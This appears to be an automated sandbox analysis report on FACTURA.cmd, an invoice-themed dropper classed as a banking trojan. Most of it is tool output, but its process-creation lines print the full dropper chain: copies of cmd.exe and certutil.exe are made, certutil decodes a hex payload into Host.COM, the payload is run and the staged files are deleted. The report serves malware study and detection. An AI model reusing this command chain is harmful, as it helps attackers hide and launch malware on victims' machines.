      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376AA3010_2_00007FF79376AA30
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374524010_2_00007FF793745240
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374765010_2_00007FF793747650
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374D25010_2_00007FF79374D250
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793749E5010_2_00007FF793749E50
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793750A6C10_2_00007FF793750A6C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374E68010_2_00007FF79374E680
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376EE8810_2_00007FF79376EE88
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7937481D410_2_00007FF7937481D4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79376D9D010_2_00007FF79376D9D0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79374CE1010_2_00007FF79374CE10
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF793747D3010_2_00007FF793747D30
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF79377153810_2_00007FF793771538
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79375785411_2_00007FF793757854
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937537D811_2_00007FF7937537D8
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374341011_2_00007FF793743410
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374AA5411_2_00007FF79374AA54
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793748DF811_2_00007FF793748DF8
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79375555411_2_00007FF793755554
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937518D411_2_00007FF7937518D4
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374B0D811_2_00007FF79374B0D8
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374851011_2_00007FF793748510
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793742C4811_2_00007FF793742C48
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376AC4C11_2_00007FF79376AC4C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374188411_2_00007FF793741884
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376AFBC11_2_00007FF79376AFBC
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793746BE011_2_00007FF793746BE0
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374372C11_2_00007FF79374372C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793749B5011_2_00007FF793749B50
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793745B7011_2_00007FF793745B70
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793743F9011_2_00007FF793743F90
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793746EE411_2_00007FF793746EE4
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793767F0011_2_00007FF793767F00
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79375422411_2_00007FF793754224
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374222011_2_00007FF793742220
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793744A3011_2_00007FF793744A30
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376AA3011_2_00007FF79376AA30
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374524011_2_00007FF793745240
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374765011_2_00007FF793747650
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374D25011_2_00007FF79374D250
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793749E5011_2_00007FF793749E50
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793750A6C11_2_00007FF793750A6C
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374E68011_2_00007FF79374E680
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376EE8811_2_00007FF79376EE88
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7937481D411_2_00007FF7937481D4
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79376D9D011_2_00007FF79376D9D0
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79374CE1011_2_00007FF79374CE10
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF793747D3011_2_00007FF793747D30
      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF79377153811_2_00007FF793771538
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02DF44DC appears 74 times
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02E08954 appears 56 times
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02DF46D4 appears 244 times
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02DF4500 appears 33 times
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02DF4860 appears 949 times
      Source: C:\Users\Public\Libraries\Host.COMCode function: String function: 02E089D8 appears 45 times
      Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF793753448 appears 72 times
      Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF79375498C appears 40 times
      Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF79375081C appears 36 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E089F11C appears 37 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E089F1B8 appears 183 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E0857BAC appears 34 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E079D1C8 appears 41 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E082EB98 appears 93 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E08A64A6 appears 173 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E084ABFC appears 818 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E0850D10 appears 181 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E0857D70 appears 35 times
      Source: C:\Users\Public\kn.exeCode function: String function: 00007FF7E07CBC9C appears 280 times
      Source: classification engine, Classification label: mal100.bank.troj.evad.winCMD@22/11@1/1
      Source: C:\Users\Public\alpha.exe, Code function: 3_2_00007FF7937432B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E087826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle
      Source: C:\Users\Public\alpha.exe, Code function: 3_2_00007FF79376FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E08841E0 _wcsnicmp,CoCreateInstance,#357
      Source: C:\Users\Public\kn.exe, Code function: 6_2_00007FF7E0856320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError
      Source: C:\Windows\System32\extrac32.exe, File created: C:\Users\Public\alpha.exe
      Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
      Source: C:\Users\Public\Libraries\Host.COM, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Windows\System32\extrac32.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: FACTURA.cmd, ReversingLabs: Detection: 33%
      Source: FACTURA.cmd, Virustotal: Detection: 34%
      Source: unknown, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FACTURA.cmd" "
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Users\Public\alpha.exe, Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
      Source: C:\Users\Public\alpha.exe, Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
      Source: C:\Users\Public\alpha.exe, Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      Source: C:\Windows\System32\cmd.exe, Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S
      Source: C:\Windows\System32\cmd.exe, Section loaded: cmdext.dll
      Source: C:\Windows\System32\cmd.exe, Section loaded: apphelp.dll
      Source: C:\Windows\System32\extrac32.exe, Section loaded: cabinet.dll
      Source: C:\Windows\System32\extrac32.exe, Section loaded: uxtheme.dll
      Source: C:\Windows\System32\extrac32.exe, Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\extrac32.exe, Section loaded: textinputframework.dll
      Source: C:\Windows\System32\extrac32.exe, Section loaded: coreuicomponents.dll
      Source: C:\Windows\System32\extrac32.exe, Section loaded: coremessaging.dll
      Source: C:\Windows\System32\extrac32.exe, Section loaded: ntmarta.dll
      Source: C:\Windows\System32\extrac32.exe, Section loaded: wintypes.dll
      Source: C:\Windows\System32\extrac32.exe, Section loaded: textshaping.dll
      Source: C:\Users\Public\kn.exe, Section loaded: certcli.dll
      Source: C:\Users\Public\kn.exe, Section loaded: cabinet.dll
      Source: C:\Users\Public\kn.exe, Section loaded: cryptui.dll
      Source: C:\Users\Public\kn.exe, Section loaded: ncrypt.dll
      Source: C:\Users\Public\kn.exe, Section loaded: netapi32.dll
      Source: C:\Users\Public\kn.exe, Section loaded: ntdsapi.dll
      Source: C:\Users\Public\kn.exe, Section loaded: version.dll
      Source: C:\Users\Public\kn.exe, Section loaded: secur32.dll
      Source: C:\Users\Public\kn.exe, Section loaded: certca.dll
      Source: C:\Users\Public\kn.exe, Section loaded: cryptsp.dll
      Source: C:\Users\Public\kn.exe, Section loaded: samcli.dll
      Source: C:\Users\Public\kn.exe, Section loaded: logoncli.dll
      Source: C:\Users\Public\kn.exe, Section loaded: dsrole.dll
      Source: C:\Users\Public\kn.exe, Section loaded: netutils.dll
      Source: C:\Users\Public\kn.exe, Section loaded: sspicli.dll
      Source: C:\Users\Public\kn.exe, Section loaded: ntasn1.dll
      Source: C:\Users\Public\kn.exe, Section loaded: uxtheme.dll
      Source: C:\Users\Public\kn.exe, Section loaded: profapi.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: apphelp.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: version.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: uxtheme.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: url.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: ieframe.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: iertutil.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: netapi32.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: userenv.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: winhttp.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: wkscli.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: netutils.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: windows.storage.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: wldp.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: kernel.appcore.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: propsys.dll
      Source: C:\Users\Public\Libraries\Host.COM, Section loaded: amsi.dll
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COM Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
      Source: FACTURA.cmdStatic file information: File size 7518388 > 1048576
      Source: Binary string: easinvoker.pdb source: Host.COM, Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: easinvoker.pdbGCTL source: Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800405801.000000000286A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3034224686.0000000002871000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp

      Data Obfuscation

      Source: Yara matchFile source: 9.2.Host.COM.2df0000.2.unpack, type: UNPACKEDPE
      Source: alpha.exe.2.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08954 LoadLibraryW,GetProcAddress,FreeLibrary,9_2_02E08954
      Source: alpha.exe.2.drStatic PE information: section name: .didat
      Source: kn.exe.4.drStatic PE information: section name: .didat
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C3668 push rsp; ret 6_2_00007FF7E07C3669
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1D2FC push 02E1D367h; ret 9_2_02E1D35F
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF63D3 push 02DF640Bh; ret 9_2_02DF6403
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1C374 push 02E1C56Ah; ret 9_2_02E1C562
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF332C push eax; ret 9_2_02DF3368
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1D0AC push 02E1D125h; ret 9_2_02E1D11D
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E03073 push 02E030C1h; ret 9_2_02E030B9
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E03074 push 02E030C1h; ret 9_2_02E030B9
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1D1F8 push 02E1D288h; ret 9_2_02E1D280
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1D144 push 02E1D1ECh; ret 9_2_02E1D1E4
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0F104 push ecx; mov dword ptr [esp], edx9_2_02E0F109
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF678C push 02DF67CEh; ret 9_2_02DF67C6
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF678A push 02DF67CEh; ret 9_2_02DF67C6
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DFD5A8 push 02DFD5D4h; ret 9_2_02DFD5CC
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1C56C push 02E1C56Ah; ret 9_2_02E1C562
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DFC574 push ecx; mov dword ptr [esp], edx9_2_02DFC579
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08AD2 push 02E08B0Ch; ret 9_2_02E08B04
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08AD4 push 02E08B0Ch; ret 9_2_02E08B04
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0AADB push 02E0AB14h; ret 9_2_02E0AB0C
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0AADC push 02E0AB14h; ret 9_2_02E0AB0C
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DFCBF4 push 02DFCD7Ah; ret 9_2_02DFCD72
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08874 push 02E088B6h; ret 9_2_02E088AE
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E64850 push eax; ret 9_2_02E64920
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DFC9E6 push 02DFCD7Ah; ret 9_2_02DFCD72
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0694E push 02E069FBh; ret 9_2_02E069F3
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E06950 push 02E069FBh; ret 9_2_02E069F3
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E07914 push 02E07991h; ret 9_2_02E07989
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E05E84 push ecx; mov dword ptr [esp], edx9_2_02E05E86
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E02F68 push 02E02FDEh; ret 9_2_02E02FD6

      Persistence and Installation Behavior

      Source: C:\Users\Public\kn.exe File created: C:\Users\Public\Libraries\Host.COM
      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe

      Boot Survival

      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF676A IsIconic,9_2_02DF676A
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0AB18 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_02E0AB18
      Source: C:\Users\Public\Libraries\Host.COM Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
      Source: C:\Users\Public\Libraries\Host.COM Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\Libraries\Host.COM Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\Public\Libraries\Host.COM Memory allocated: 2DF0000 memory commit 570007552
      Source: C:\Users\Public\Libraries\Host.COM Memory allocated: 2DF1000 memory commit 570179584
      Source: C:\Users\Public\Libraries\Host.COM Memory allocated: 2E1D000 memory commit 570003456
      Source: C:\Users\Public\Libraries\Host.COM Memory allocated: 2E1E000 memory commit 570351616
      Source: C:\Users\Public\Libraries\Host.COM Memory allocated: 2E74000 memory commit 571015168
      Source: C:\Users\Public\Libraries\Host.COM Memory allocated: 2F6E000 memory commit 570015744
      Source: C:\Users\Public\alpha.exeAPI coverage: 8.1 %
      Source: C:\Users\Public\alpha.exeAPI coverage: 8.6 %
      Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
      Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
      Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,3_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,3_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,3_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,3_2_00007FF793741560
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF7937435B8
